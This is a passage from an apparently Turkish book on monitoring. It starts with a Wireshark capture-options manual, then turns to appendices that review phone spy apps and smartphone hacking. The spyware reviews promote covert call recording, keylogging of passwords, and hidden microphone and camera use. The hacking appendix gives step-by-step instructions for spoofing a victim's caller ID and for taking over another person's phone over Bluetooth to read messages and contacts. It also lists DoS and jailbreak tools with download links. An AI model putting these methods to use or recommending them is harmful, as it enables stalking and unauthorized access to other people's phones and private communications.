Yakalama seçenekleri penceresini seçilen arayüz için açma.
Details (Ayrıntılar Yalnız MS Windows için)
Bu arayüz için ayrıntılı açıklamayla seçenek penceresi açma.
Help (Yardım)
Yardım sayfasını görüntüleme.
Close (Kapatma)
Pencereyi kapatma.

Yakalama Seçenekleri Penceresi
Yakalama menüsünden seçenekler seçildiğinde, program “Yakalama
Seçenekleri” penceresini açar. Hangisini seçeceğinizi bilmiyorsanız
varsayılanları olduğu gibi bırakabilirsiniz.
Yakalama Çerçevesi
Tüm var olan arayüzlerinin ayarlarını gösterir.
Arayüzün adı ve IP adresi. Sistemden seçilebilen yoksa “none”
(hiçbiri) gösterilir.
Bağlantı katmanı başlık tipi
“promicuous” (ayrım gözetmeyen) konum açık mı kapalı mı
bilgisi
Her pakette yakalanacak en çok veri boyu (varsayılan 65535)
Yakalanan paketleri saklayacak Kernel tampon alanının boyu.
(Unix/Linux için) Paketler yalnız izleme konumundayken mi
yakalanır.
Seçilen yakalama filitresi.
İlk kolondaki onay kutularını (checkbox) işaretleyerek yakalanacak
veri paketleri için seçilir. Arayüz iki kez tıklanınca “Edit Interface
Settings” (Arayüz ayarlarını Düzenleme) penceresi açılır.
Tüm arayüzlerinden yakala
Çoklu arayüzden yakalama yapılır. Var olan arayüzlerinden
istenilenler seçilebilir.
Tüm paketleri ayrım gözetmeden yakala
Yakalama yaparken tüm arayüzlerini ayrım gözetmeyen konuma
getirir.
Yakalama Filitresi
Yakalama filitresi belirtmeye yarar. Seçilen arayüzlerinden gelen
paketlerden filitrden geçenler yakalanır.
“Capture Filter” (Filitre yakalama düğmesine basarak da filitre
penceresinin açılması sağlanabiliir.
RPF'lerden seçilenleri derleme
Bu düğme yakalama filitresini RPF koduna çevirir ve açılan

pencerede kodun nasıl yazıldığı gösterilir. Bunun yararı yaratılan
filitrenin nasıl olduğunun anlaşılabilmesidir.
Arayüzleri Yönetme
Bu düğme sizi yeni arayüz ekleme penceresine götürür. “Pipe”
tanımları yapılır, yerel arayüzler taranır ya da uzak arayüzleri
eklenir.
Yakalama Dosyaları Çerçevesi
Bu çerçevede yer alan bilgi alanları şöyledir.
Dosya (File)
Yakalama Dosyası olarak kullanılacak dosya adı buraya yazılır.
Varsayılan olarak alan boştur. Boş dosya adı, yakalanan verilerin
geçici bir dosyada tutulduğunu anlatır. Dosya sisteminde tarama
yapmak istenirse alanın yanındaki düğme kullanılmalıdır.
Çoklu dosya kullanma
Bir dosya kullanma yerine, belirli bir noktaya gelinmişse (paket
sayısı gibi) program otomatik olarak bir yenisine geçer.
Pcap-ng kalıbı kullan
Bu onay kutusu programın yakalanan paketleri pcap-ng kalıbında
saklamasını sağlar. Bu sonraki kuşak paket saklama yöntemi
yeni geliştirilmiştir. Eğer birden çok arayüz yakalama için
seçilmişse bu onay kutusu varsayılan olarak seçilir.
Her n bayt sonra yeni dosya
Bir dosya n bayt olduktan sonra yeni dosyaya geçilir.
Her n dakika sonra yeni dosya
Verilen süre geçince yeni dosyaya geç.
N dosyayla tamponu döndür
Verilen sayıdan dosya dolunca yakalamaya ilk dosyadan başla.
N dosyadan sonra yakalamayı durdur.
Verilen sayıda dosya oluştuktan sonra yakalamayı durdur.
Yakalamayı durdurma çerçevesi
...n paket sonra
...n megabsyt sonra
...n dakika sonra

Görüntüleme Seçenekleri Çerçevesi
Gerçek zamanlı paket listesini güncelleme
Programın paket listesi panosunu gerçek zamanlı
güncelleyebileceği belirtilir. Normalde program yakalanan
paketleri yakalama bitmeden göstermez. Programın yakalama
işlemi ayrı, görüntüleme işlemi ayrıdır.
Canlı yakalamada otomatik liste kaydırma (scroll)
Yeni paketler geldikçe bu seçenek paket listesinin kaydırılacağını
anlatır. Belirtilmezse program gelen paketleri listenin sonuna
ekler ve panoyu kaydırmaz.
Yakalama Bilgisini Saklama
Bu seçenek işaretlendiğinde yakalama bilgisi penceresi kapanır.
Ad Çözümleme Çerçevesi
MAC ad çözümlemeyi aç
MAC adresleri adlara çevirmeyi sağlar.
Ağ ad çözümlemeyi aç
Ağ adreslerini adlara çevirme işlemidir.
Taşıma adlarının çözümlenmesi
Program taşıma adreslerini protokol adlarına çevirir.
Düğmeler
Değerleri ayarladıktan sonra işleme başlamak için “Start” tuşuna
basılır. Ya da “Cancel” tuşuna basılarak işlem kesilir.
Yakalamayı başlatınca, durdurmak için “Stop” tuşuna basılır.
Edit (Düzeltme Arayüzü Ayarları Penceresi
Eğer seçilmiş arayüzü üzerinde iki kez tıklarsanız Düzeltme penceresi
açılır
IP adresi
Bağlantı katmanı başlık tipi
Kablosuz bağlantı ayarları (windows)
Uzaktaki arayüz ayarları (windows)
Paketleri ayırım gözetmeden yakalama konumu

n bayt sonra paketi sınırla
Tampon alan boyu (n megabayt)
Paketleri izleme konumunda yakalama (Unix/Linux)
Yakalama filitresi
BRF Derleme
Derleme Sonuçları penceresi
Seçilen arayüzün derleme sonuçları burada gösterilir.

Yeni arayüzler ekleme penceresi
Pipe ekle ya da çıkart
Yerel arayüzü ekle ya da sakla
Uzaktaki arayüzü ekle ya da çıkart
Uzaktaki Yakalama Arayüzü

Yerel arayüz üzerinden yakalama yapılırken, ağ dışındaki yakalama
arka plan programına ya da servisine erişip oradan veri yakalar.
Bu pencere yalnız Microsoft windows'da geçerlidir.Linux/Unix
ortamında aynısına ssh üzerinden güvenli bir şekilde erişebilirsiniz.
Uzaktan Paket Yakalama Protokol Servisi karşı tarafta çalışır durumda
olmalıdır. En kolayı WinPcap kurmaktır.
Aşağıdaki bilgi alanları doldurulmalıdır.
Host
Port
Sunucunun IP adresi
Uzaktaki Paket Yakalama protokolünün dinlendiği kapı
numrasıdır.
Null Authentication
Şifre denetimi istenmezse tanımlanır.
Password authentication
Diğer platformlara bağlanmanın normal yoludur.
Uzaktan Yakalama Ayarları
RPCAP trafiğini yakalama
Veri göndermek için UDP kullan
Örnekleme seçeneği kullanılmayacak
Örnekleme seçeneği x pakette bir

Örnekleme seçeneği x milisaniyede bir
Arayüz Ayrıntıları penceresi
Yakalama Dosyaları ve Dosya konumları
libpcap yakalama makinesiyle ağ donanımındaki paketler kernel
tampon alanında bulunur. Program bu veriyi okur ve yakalama
dosyalarına yazar.
Yakalama dosyalarına yazarken değişik veri konumları vardır:
Büyük dosyalarla çalışırken (bir kaç 100 Mbayt) işlem yavaş olabilir.
Uzun dönem yakalama yapılacaksa, ya da yüksek trafiği olan bir ağda
yakalama yapılacaksa “Çoklu dosya” seçeneğini düşünün. Yakalanan
paketleri parçalara böler.
Bazen çoklu dosya kullanımında paket bir dosyada verilerin bir kısmı
diğer dosyada kalabilir. Bu durumda ikincil bölüm hatalı paket gibi
yorumlanabilir.

Tek geçici dosya
Kullanılan dosya adı wiresharkXXXXXX
foo.cap adlı dosya kullanımı
dosya adı foo.cap
foo.cap çoklu dosya kullanımı
foo_00001_20100205110102.cap
foo_00001_20100205110318.cap
foo.cap çoklu dosya dönmeli
foo_00001_20100205110102.cap
foo_00002_20100205110318.cap,
Var olan dosya konumları
Tek Geçici Dosya
Tek adlandırılmış dosya
Çok dosya sürekli yenilenen
Çoklu dosya dönmeli
Bağlantı Katmanı Başlık tipi
Genel olarak bağlantı katmanı başlık tipini seçmezsiniz. Ama özel
olarak seçim yapılmasının nedeni aşağıda anlatılmıştır.
Eğer 802.11 cihazının BSD üzerinde verilerini yakalıyorsanız, size
“Ethernet” ve “802.11” seçeneği sunabilir. Ethernet paketleri
yakalanırken sahte ethernet paketleri olabilir. “802.11” için IEEE
802.11 başlıkları olmalıdır.
Eğer Endace DAG kartlarından yakalama yapıyorsanız, senkron seri
hatta bağlı hatlarda seri “hat üzerinden PPP” ya da “Cisco HDLC”
bağlantı olacaktır. Burada “Cisco HDLC” seçilmelidir.
Eğer Endace DAG kartı ATM ağına bağlıysa, “RFC 1483 ATM-üzerinden-
IP” ya da “Sun ham ATM” seçenekleri çıkar. Eğer yakalanan trafik
yalnız “RFC 1483LLC-encapsulated IP” ise, ya da yakalanan SunATM
başlıklarını desteklemeyen bir uygulama kullanılıyorsa “RFC 1483
ATM-üzerinden-IP”, aksi halde “Sun ham ATM” seçilmelidir.
Eğer bir ethernet cihazı üzerinden yakalama yapılıyorsa bu kez
“ethernet” ya da “DOCSIS” seçenekleri vardır. Eğer Cisco kablolu

modem'den yakalama yapıyorsanız ve DOCSIS trafiği oluşuyorsa,
seçim bu şekilde olmalıdır.
Yakalarken Filtreleme
Yakalama filtrelerinde program libpcap filtreleme dilini kullanır. Konu
burada kısaca anlatılmıştır.
Bir çok örnek http://wiki.wireshark.org/CaptureFilters adresinde vardır.
Yakalama Seçenekleri penceresindeki bilgi alanına yakalama filitresi
girilir.
Filitre aşağıdaki kalıba göre hazırlanır:
[not] ilkel_tanım [and|or [not] ilkel_tanım ...]
Örnek:
tcp port 23 and host 10.0.0.5
Burada 10.0.0.5 sunucusundan gelen telnet trafiği yakalanır.
Bazı ilkel tanımlar:
[src|dst] host
ether [src|dst] host
gateway hos
[src|dst] net [{mask }|[len }]
[tcp|udp][src|dst] kapı
less|greater
ip|ether proto
ether|ip broadcast|multicast
relop
Uzaktan otomatik Trafik Filitreleme
Eğer program uzakta çalışıyorsa (SHH, X terminal sunucu ya da
terminal sunucu), uzaktaki sonuçlar ağ üzerinden taşınmalıdır.Uzakta
programın çalışıp çalışmadığı aşağıdaki çevre değişkenlerinin
incelenmesiyle çözümlenir:
SSH_CONNECTION (ssh)
SHH_CLIENT (ssh)

REMOTEHOST (tcsh, others)
DISPLAY (x11)
[uzaktakinin adı]
SESSIONNAME (terminal sunucu)
Windows ortamında uzaktaki masa üstü Servis çevresi var mı diye
işletim sistemine sorulur.
Yakalama Çalışırken
Yakalama Çalışırken “Yakalama Bilgisi” penceresi görüntülenir.
Yakalanan paketler hakkında bilgi verirken, sayılan protokollar
değişmez. Bu pencere gizli/görünmez olabilir.
Yakalamayı durdurmak
Çalışan bir yakalama aşağıdakilerden biriyle durdurulabilr:
Stop düğmesine basılarak
Menü seçeneği olan Capture/Stop
Araç Çubuğu ögesi “stop” kullanılarak
Ctrl+E hızlandırma tuşlarına basılarak
“Stop” koşullarından biri oluşmuşsa yakalama otomatik
durdurulur.
Koşan bir yakalamayı yeniden başlatmak
AYnı yakalama seçenekleriyle çalışan bir yakalama yeniden
başlatılabilir. Daha önce yakalanmış paketler silinir.
Restart aslında önce stop hemen sonra start ile aynıdır.
Aşapıdakilerden biriyle restart tetiklenir:
Menü seçeneği Capture/restart
Araç Çubuğu ögesi Restart.

Ek-7
TELEFON CASUS YAZILIMLARI İNCELEMELERİ
Burada açıklanan inceleme bilgileri http://acisni.com/cell-phone-spy-softwarecomplete-guide/
web sitesinden alınıp derlenmiştir.
STEALTHGENIE
Bu konuda ayrıntılar ve güncel bilgi http://acisni.com/stealthgenie1 web
adresinden sağlanabilir.
Aslında gerçekten çalışıp çalışmadığı konusunda şüphelere düşersiniz.
Güvenli bir yazılımdır. Bu yazılım üreten firma piyasa lideridir. Bu nedenle
özellikleri diğer yazılımlara göre daha fazladır. Pazardaki diğer firmalar,
onları yakalamaya çalışarak yazılımlarını benzetme uğraşısı içindedirler.
Yazılımın kullanılabileceği ortamlar:
Android (4.4 sürüme kadar hepsi)
Apple iPhone (iPhone 5 de dahil 7.0.4 sürüme kadar)
BlackBerry (7.2 sürüme kadar)
Yeni bir işletim sistemi çıktığında yazılım firmaları, uygulamaları onu
desteklesin diye çalışmaya başlar ve çoğu zaman StealthGenie ilk sürümü
çıkaran olur.
Genelde SMS mesaj kayıtları, görüşme kayıtları, GPS izleme, eposta izleme
web tarihçesini izleme ve hedef telefonda saklanan dosyalar olarak
desteklenen temel izleme yazılımlarıdır.
Ama StealthGenie birkaç ek özellikle diğerlerinin önüne geçer.
Görüşme Kayıt Özelliği
StealthGenie almak isteyenlerin en önemli gerekçelerinden biri bu
özelliktir. Eğer bu özelliği istiyorsanız, StealthGenie seçmekte
haklısınızdır. Kayıtları daha sonra PC üzerinde saklayabilirsiniz.
WhatsApp ve Diğerlerini İzleme
Rooted Android ve iPhone üzerinde çeşitli mesaj servisleri ve chat
programları izlenebilmektedir. BlackBerry kendi ortamında
izlenebilmektedir

.
Gmail izleme
Bir çok casus program telefondaki ana e-posta hesabını izler.
StealthGenie ana e-posta hesabını ve diğer Gmail tabanlı hesapları
izleyebilir.
Tetikleme Kelimeleri
Bazı tetikleme kelimeleri ya da telefon numaraları tanımlanabilir. Eğer
herhangi bir iletişim (e-posta ya da SMS gibi) bu kelimeleri içeriyprsa
(telefon numarası da dahil) uyarı mesajı üretilir. Kontrol panelinden bu
uyarılara ilişkin mesajlar anında görüntülenebilir. Çocuklarınızı izlerken
bu çok akıllı ve yararlı bir olanaktır.
Güvenlik Özellikleri
StealthGenie paketlerinin bazılarında güvenlik özelliği denen olanakları
kullanmak mümkündür.
Hedef telefonu uzaktan kilitleyip açabilirsiniz. Kayıp ve çalınmışsa çok
kullanışlıdır.
Değerli verileri başka bir ortamda saklamak ve yedeklemek. Aslında
telefonda saklanan bilgilerin tümü silebilirsiniz. İş ve kişisel amaçlar
için idealdir.
MOBIL SPY
Eski ve güvenilir bir yazılımdır. Günceldir (Şubat 2014'de bu satırlar
yazılırken güncel sürümü çıkmıştır). 2003 yılından beri cep telefonları izleme
yazılımı olarak kullanılmaktadır. ABD firmasıdır. Web sayfalarına
bakıldığında, güncel olup olmadığı incelenebilir.
Birçok cep telefonunu ve işletim sistemini desteklerler. Bugüne göre
desteklenen telefon işletim sistemleri şöyledir:
Android 4.4.2 sürümüne kadar
iPhone 7.0.4 sürümüne kadar
BlackBerry 7.1 sürümüne kadar
Symbian 9.5 sürümüne kadar
Web sitelerinden her zaman son destekledikleri sürümler öğrenilmelidir.
Özellikleri
Standart özelliklerin tümünü içerir. SMS mesajları, telefon geçmişi, GPS
izleme, e-posta, web tarayıcısı geçmişi, videolar, resimler ve telefon
rehberi gibi telefon dosyaları bunların arasındadır.
Burada diğerlerinden farklı olan özellik, gelişmiş özelliklerin nasıl bir
fiyat planına yerleştirilmiş olduğudur.

Gelişmiş Özellikler
Mesajlaşma (Messenger) ve Sosyal medya izleme (Social Monitoring)
ile Facebook, Twitter, WhatsApp, messenger, Windows'un güvenli
kabul ettiği Live, Aol, BlackBerry, Gtalk, iPhone ve iPad için
iMessenger. Diğer söyleşi (chat) ve sosyal medya listeleri başka
yazılımlara göre oldukça gelişmiştir.
YouTube – YouTube da izlenen tüm videoların görüntülenmesini sağlar.
BlackBerry Pin Message – BlackBerry kullanıcıları için
Gmail – zaman damgalı ve eposta içerikli tüm kullanıcı postalarını
görüntüler.
Alerts (Uyarılar) – Telefon numaraları için tetikleyici kelimeler
atanabilir. Kelimelerden herhangi biri ya da telefon numarası kayıtlara
girecek olursa, uyarı mesajı alınır. Gözünüzün çocuklar üzerinde olması
için önemli bir özelliktir.
Yüklenmiş Uygulamalar ve Uygulama engelleme – Bu özellik hedef
telefondaki tüm uygulamaların listesini verir ve istenilenin
engellenmesini sağlar. Bunlar ana denetim masasından
yönlendirilebilir ve bunlar standart paketin parçasıdır.
Uzaktan Kontrol - programın ana menusu uzaktan kontrol edilir.
Telefonu kapatıp (kilitleyip) açabilirsiniz. Telefondaki verileri
silebilirsiniz. SIM kart bilgilerine erişebilirsiniz. Casus yazılımı bile
silebilirsiniz (artık izleme yapmayacaksanız).
Ana menü bilgisi – Etkileşimli ana menu ekranında hedef telefonun
tüm özelliklerini görebilirsiniz. İşlerim Sistemi sürümü, Son
güncelleme, WiFi ayarları ve hatta pilin kalan gücü. Ana menüde
izlenen telefonlar arasında birinden diğerine geçiş yapabilirsiniz.
Verilere PC, laptop, tablet ya da cep telefonundan erişebilirsiniz.
Bunlar standart paket altında sunulan özelliklerdir.
Canlı (Live) Denetim Masası Özellikleri
Bu eklentiyi almanız gerekmez ama almışsanız sunduğu ek özellikler
aşağıda anlatılmıştır:
Canlı ekran görüntüsü – hedef telefonun o anki ekran görüntüsünü alıp
ne işler yapıldığını görebilirsiniz. 90 saniyelik aralıklarla yinelenir.
Telefonun Çevresini kaydet – Casus böceği (dinleme cihazı) olarak
kullanıp, hedef telefonun mikrofonundan çevredekiler dinlenir.
Gizli Kamera – Bu yeni eklenen özelliktir. Hedef telefonla resim
çekebilirsiniz. Bunu sevenler çıkabilir.
Kayıtların e-postayla gönderilmesi – Ana menüde ayarlarını yaparak
kayıtların verdiğiniz e-posta adresine gönderilmesini isteyebilirsiniz.
Bazı özellikler atlanmış olabilir ama bu yazılımın neler yapabileceği

aşağı yukarı anlaşılmıştır. Unutulmamalıdır ki tüm özellikler tüm
telefonlarda kullanılmayabilir.
mSPY
Buradaki bilgiler sürekli güncellenen bir incelemeden alınmıştır. Web
sitelerinden her zaman güncel bilgi elde edilebilir (http://acisni.com/mspy).
Hem tabletler hem de cep telefonlarında çalışır. Aşağıdaki işletim
sistemleriyle kullanılabilir:
Android telefon ve tabletler (4.4 sürümüne kadar)
iPhone ve iPad (7.0.4 sürümüne kadar)
BlackBerry (7.0 sürümüne kadar)
Symbian (Nokia)
Yazılım bu tür telefonların hepsinde çalışır ama web sitesindeki telefon
listesinden kontrol etmek daha doğru olabilir.
mSpy'dan gelişkin Özellikler
mSpy SMS mesajları, görüşme kayıtları, izleme ve web tarihçesi gibi
kayıtların yanı sıra aşağıdaki özellikleri de içerir:
Görüşme kaydı – StealthGenie ve mSpy güvenilir görüşme kaydı
saklayan iki yazılımdır. Görüşmede iletişim zayıflarsa kayıt kesilir.
Android telefonlar için geçerlidir.
Telefon Çevresindekileri Kayıt etme – Böcek gibi davranır ve
mikrofonundan çevresinde konuşulanları kaydeter.
Mesajları izleme – WhatsApp, Viber, Skype, iMessage ve Facebook
Messenger etkinliklerini kayıt eder ve izler (Bu özellikler rooted
Android ve iPhone/iPad cihazları için geçerlidir)
Çağrı Engelleme – Telefon numaralarını tanımlar ve onlardan gelen
çağrıları engelleyebilirsiniz.
Web sitesi engelleme – Önceden tanımlanmış web sitelerine girişi
engeller.
Uygulama Engelleme – Tüm yüklenmiş uygulamaları görüp, hangilerini
engelleyeceğinizi belirlersiniz.
Tuş kaydı – mSpy'a özeldir. Tuşlanan herşeyin kaydını tutar. Mesajlar,
şifreler, giriş bilgileri ve e-postalar bu özellikle saklanır. Şu anda yalnız
Android için geçerlidir.
Yönetim Özellikleri – Raporların nasıl gönderileceğine ilişkin işlemlerdir.
Raporlar yalnız WiFi ile gönderilebilir. GPS aralıkları da raporlanabilir.
Güvenlik özellikleri – Telefonu kilitleme, telefon bilgilerini silme, SIM
değişiklik bilgisini alma, durdurma ya da uygulamayı silme bir güvenlik
panelinden uzaktan yapılabilir.

Ek-8
AKILLI TELEFON HACKLEME
Burada anlatılanlar http://www.hackersonlineclub.com/jailbreak-ios Web
sitesindeki yazılardan derlenmiştir.
Hack olayında kullanılan yazılımlar (tarama ya da saldırı amaçlılar) burada kısaca
anlatılmış, nereden sağlanacağı Web adresiyle gösterilmiştir.
ANDROID ARAÇLARI
Hacker Araç Kutusu
Sızma testleri için kullanılan bir uygulamadır. Ahlaklı hacker'lar, BT
yöneticileri ve Siber güvenlik uzmanları keşfetmek, kırılmaları aramak gibi
amaçlarla kullanırlar.
İndirmek için (https://github.com/SecurityCompass/AVDClone) adresini
kullanın.
AVD Klonu
Android sanal donanımlarını, Android SDK (Yazılım Geliştirme Araçları)
yönetimi tarafından kolay dağıtımı için kullanılır. İstediğiniz uygulama ve
ayarlarla bir depo oluşturabilirsiniz. Diğerlerinin Android SDK depoları da
sizin oluşturduğunuz ortama yönelir.
İndirmek için (https://github.com/SecurityCompass/AVDClone) adresini
kullanın.
APKInspector
Bu uygulamanın amacı, derlenmiş Android uygulamasını incelemek ve varsa
içindeki virüs benzeri bölümleri bulmaya çalışmaktır.
İndirmek için (http://code.google.com/p/apkinspector/) adresini kullanın.
Burp Suite
Web uygulamalarının güvenlik denetimi için kullanılan bir uygulamadır. Tüm
deneme ve testler birçok aracın birlikte kullanımıyla gerçekleşir. İndirmek
için (http://www.portswigger.net/burp/) adresi kullanılır.
Androguard
Kendi analiz araçlarınızı yaratmanızı sağlar. Bir dizi android uygulaması
analiz edilir. Açık kaynak kötü amaçlı android yazılımları da incelenir.
İndirmek için (http://code.google.com/p/androguard/#Description) adresi
kullanılır.
Sömürmek için Android İskeleti (Android Framework Exploitation)

Smartphone Pentest Framework yazılımı, modern Dünyanın sızma
denemelerindeki gibi bir yaklaşımla çevrenizdeki akıllı telefonların
güvenliğini kırmaya ve içine girmeyi sağlar. İndirmek için
(http://www.github.com/xysec/) adresini kullanabilirsiniz.
Android Ağ araçları (Network Toolkit)
Bu uygulama sizin ağınızın haritasını çıkarır. Çevredeki araçları ya da
ayarları inceler. Amatör kullanıcıların ev içindeki diğer araçlara sızma
denemelerinde kullanılır. ANTI başka yararlı amaçlar için de kullanılabilir.
Bunlar özet olarak; Açık kapılara kolay bağlantı, URL ve çerezleri görsel
izleme (sniffing) ve MiTM saldırıları düzenlemeler (önceden tanımlanmış
kullanıcı filtrelerini kullanma), Sunucu/İstemci tarafındaki faydalanmalar,
Şifre kırma ya da şifre güvenlik düzeyini belirleme, resimleri örneklerde ve
hizmet saldırılarında kullanma gibi işlemlerdir. Hepsi bir paket olarak
kullanışlı kullanıcı arayüzüyle bir Android uygulaması olarak sunulmuştur
(yakında iOS uygulaması olarak da kullanıma açılacaktır). İndirmek için
(http://www.zimperium.com/anti.html) adresini kullanın.
ANONdroid
AN.ON isimsiz hizmet uygulamasıdır. Bu istemci yazılımı WEB sayfalarında
isimsiz (IP numarasız) dolaşmanızı sağlar. Aslında bilgisayarınızda bir proxy
sunucu gibi çalışır. Jo Do tarafından üretilen kitaplıkları kullanır. Akıllı telefon
arayüzüne benzeyen kullanıcı arayüzleri vardır.
İndirmek için (https://market.android.com/details?id=anondroid.anondroid=
web sitesi kullanılır.
Am I Hacker Proof (Hacker'dan kurtulmuş muyum?)
Bu program bilgisayarınızı, ağınızı ya da Web sitenizi dışarıdan bir hacker
gibi tarar, gedikleri bulur ve size e-posta ya da SMS üzerinden gedikleri
bildirir. Bu program telefonunuzun kaynaklarını kullanmaz. Başlarken size
bildirir (e-posta ya da SMS olarak), sonra bittiğini de bildirir.
Aşağıdaki hizmetler ücretsiz sunulur:
Üç tür taramadan biri seçilebilir. Hızlı (Quick) tarama (dört saate kadar
tarama), Tüm (Complete) tarama (tamamlanması dört gün sürer) ve Web
sitesi taraması (WordPress Web sitelerini tarar).
IP adresi ya da Web adresi üzerinden tarama yapabilirsiniz.
Bir ayda 10 kez tarama yapabilirsiniz (ucretsiz olduğu için)
Ping, traceroute, whois, ISP/E-posta hizmet sağlayıcısı veri tabanı ve gerçek
zamanlı siber güvenlik haberleri gibi hazır araçları vardır.
Raporlar PDF dosyalarda saklanır, istenirse e-posta adresinize gönderilir.
Telefonunuzdaki hesap www.AmIHackerProff.com web sitesiyle uyumlu
çalışır.

VoiceMail hack etme
Ping, traceroute, whois, ISP/E-posta servis sağlayıcı veri tabanı ve gerçek
zamanlı siber güvenlik haberleri beslemesi hazır araçları vardır.
Taramalarda adres, zaman, sayı ve gedikler ya da durum ile gösterim.
E-posta ya da sms mesajıyla gediklerin bilgisi iletilir.
İndirmek için (https://market.android.com/details?
id=com.ligatt.amihackerprooffree&feature=search_result) adresini kullanın.
Hack etme eğitimi (kitapçığı)
(https://play.google.com/store/apps/details?id=x.abcd)
İzlenmesi kolay, çeşitli hack etme teknikleri adım adım anlatılmıştır.
Güçlük derecesine göre sınıflandırılmıştır.
Denenmiştir. Tüm hack etme araçları çalışır.
Görsel öğrenenler için videolar vardır.
Tüm hacker saldırılarından korunma kuralları,
Linux kökenli profesyonel arka kapı hack etme eğitimleri.
Droid Pentest
Sızma denemelerinde kullanılan tüm android uygulamalarının bulunmasında
yardımcı olur. İndirmek için
(http://sourceforge.net/projects/droidpentest/files/latest/download?) adresini
kullanın.
Wifi Protector
Android ortamında “Man in the middle” türü saldırıyı yakalayıp ölçebilen tek
uygulamadır. Başka hiçbir uygulama bu kadar yüksek ağ güvenliği
sağlayamaz. Telefonunuzu FaceNiff, Cain & Abel, ANTI, Ettercap,
DroidSheep, NetCut ve benzeri yazılımlardan korur. Yazılım sizin
oturumunuzu “Man in the Middle” aracılığıyla ARP zehirleme ve ARP
kandırmasıyla etkilemeye kalktığında sizi korur.
İndirmek için (https://market.android.com/details?
id=com.gurkedev.wifiprotector) adresi kullanılır.

MOBİL HACKLEME HİLELERİ
Çağrı örselemek (Call forging)
Birisini kendi telefonundan aramak:
http://www.mobivox.com/ adresinde ücretsiz bir hesap açın.
Hesap açarken kurbanın telefon numarasını kullanmayı unutmayın.
E-postanıza gelen iletiyle e-postanızı onaylayın. Sonra giriş yapıp “Direct
WebCall” ile numarayı arayın.
Aşağıdaki gibi bir sayfaya ulaşırsınız:
Burada “Call Now” düğmesine basın.
Arkadaşınız kendi telefonunun kendisini aradığını görünce çok şaşıracaktır.
Polis gibi sizleri arayanların bu yönteme benzer bir yöntem kullandıkları
açıktır.
Mobil Bluetooth hackleme
Aşağıda bir başkasının telefonuna erişince neler yapabileceğinizin bir listesi
var:

Mesajlarını okuyabilirsiniz
Rehberini okuyabilirsiniz (kendi telefonunuzu hangi adla sakladığını
görebilirsiniz)
Profilini değiştirebilirsiniz
Telefon zilini çaldırabilirsiniz
O telefon üzerinde müzik çalabilirsiniz
O telefonu kapatıp yende aşlatabilirsiniz.
Telefonu kapatabilirsiniz.
Fabrika ayarlarına geri döndürebilirsiniz
Zil sesini ayarlayabilirsiniz.
Bluetooth açık olan telefonu hacklemek aşağıdakiler sırayla yapılmalıdır:
Super Bluetooth Hack 1.8 indirilir. Sizin telefonunuzun bu programı
kullanabilenler listesinde olup olmadığını kontrol edin. Sonra programı
telefonunuza kurun.
Hacklenecek telefona programı yüklemek gerekmez.
Önce telefonuzdaki bluetooth'u açın sonra programı başlatın.
Bağlanma seçeneğini seçin. Blıyetooth açık olan cihazları ayarın.
Arkadaşınızın bluetooth'u açık olduğundan listede görünecektir. Sonra
işlemleri yapabilirsiniz.
MOBIL HACKLEME ARAÇLARI
AnDOSid: Andorid için DOS araçları
AnDOSid yalnız güvenlik çalışanları için tasarlanmıştır.
Mesaj gönderen android cihaza ilişkili iki tekil sayı gönderilen AnDOSid
etiketlerini tanımlar. AnDOSid güvenlik çalışanlarının DOS (Denial of Service)
saldırısı benzetmelerini sağlar. Ve doğal olarak mobil telefonlardan web için
dDOS saldırısı da oluşturulur.
Sızma araçları bu tür saldırıyı benzetmek için vardır. Ve web sitesi güvenlik
çalışanlarının bunlara karşı korunma yaplarına yararlar. Mobil cihazlar son
yıllarda yalnız telefon çağrıları için kullanılmamaktadır.
SpoofTooph
Bu program bluetooth donanımının adını, sınıfını ve adresini klonlamak ya da
kandırmak için kullanılır. Sıradan donanımda klonlama bluetooth donanımını
gizlemeye yarar. Bluetooth arama işlemi birden çok donanım varsa yalnız

irini listeler (özellikle aynı adresteklerden birini)
İndirmek için (http://sourceforge.net/projects/spooftooph/files/spooftooph-
0.5/) adresi kullanılır.
JAILBREAK iOS
Jailbreak, iOS işletim sistemi kullanan Apple donanımının sınırlarını
kaldırmaya denir.Bunun için yazılım ve donanım olanakları kullanılır. Bu
donanımlar iPhone, iPod, iPad ve ikinci jenerasyon Apple TV'dir. Jailbreak iOS
işletim sisteminde “root” erişimine izin verir. Ayrıca, “Apple App Store” da
olmayan diğer uygulamalar, uzantılar ve temalar telefona yüklenebilir.
Evasion
Jailbreak yazılımıdır. İOS 7 ve önceki sürümlerde (iOS 6.0'dan sonrası)
çalışır. Mac Os sürümünü indirmek için (https://mega.co.nz/#!
gp9z2RTJ!VWcrCkGWqGp-0Ijk4mKRQzE_ZdU1F0ojA5aKO7Ki7jo),
windows sürümünü indirmek için (https://mega.co.nz/#!Al0lEAzA!
CEbvejP3cU2cstBT9w2apzLEMYAKFy8qu0K3Z6mjShA) adresleri
kullanılır.
RedSnow
Her hangi bir 5xiOS'dan diğerine taşınabilir.
A4 donanımlarındaki jailbreak'e Cydia da bağlanmıştır.
DFU konumuna bağlanmış, A4 donanımlarını tanımlarken “Just Boot”
bağlantısı otomatik kurulur.
3GS ortamlarında eski başlama belleği (bootrom) 6.0 jailbreak'e bağlı
değildir.
3GS ya da iPhone4 lerin herhangi birinde 6.0 hactivation bağlantısı
yoktur.
A5 öncesi donanımların firmware bilgileri yeniden yüklenir. Karmaşık
15 adımlık nasıl yapılır gibi şeylere gerek yoktur.
Her hangi bir IPSW için yeni imzalanmış blob'ları arar.
3GS ya da iPhone4 için BB güncellemesini engeller (Extras->Even
More-> Restore kullanarak)
Denemek için iTunes'dan resmi kilit açma konumunu kullanarak iPhone
telefonun etkinliğini kaldır.
“Even More” etkinlik konumlarını gösterir.
Donanım “normal” konumdayken “Identify” düğmesiyle dönen bilgi
daha çoktur.
Jailbreak'e bağlanmış ATV2 desteklenir.

Kırılmış düğmelerle WTF konumundan otomatik çıkış vardır.
Bir dizi blob uzaktan arandığında (Apple ya da Cydia) redsnow bunları
yerel olarak da saklar.
Apple için (https://sites.google.com/a/iphonedev.com/files/home/redsn0w_mac_0.9.15b3.zip?attredirects=0&d=1)
windows için (https://sites.google.com/a/iphonedev.com/files/home/redsn0w_win_0.9.15b3.zip?attredirects=0&d=1)
adreslerinden indirilebilir.
ÇEŞİTLİ CEP TELEFONU BİLGİLERİ
3G Teknolojisi
NOKIA
3G ya da üçüncü kuşak kablosuz ağ teknolojisi, kişisel ve iş ortamındaki
gelişmeleri belirtir. Roaming yeteneği, band aralığı ve hızlı iletişim
özelliklerini içerir. Bir çok ülke artık 4G teknolojisine taşınırken, hala 3G
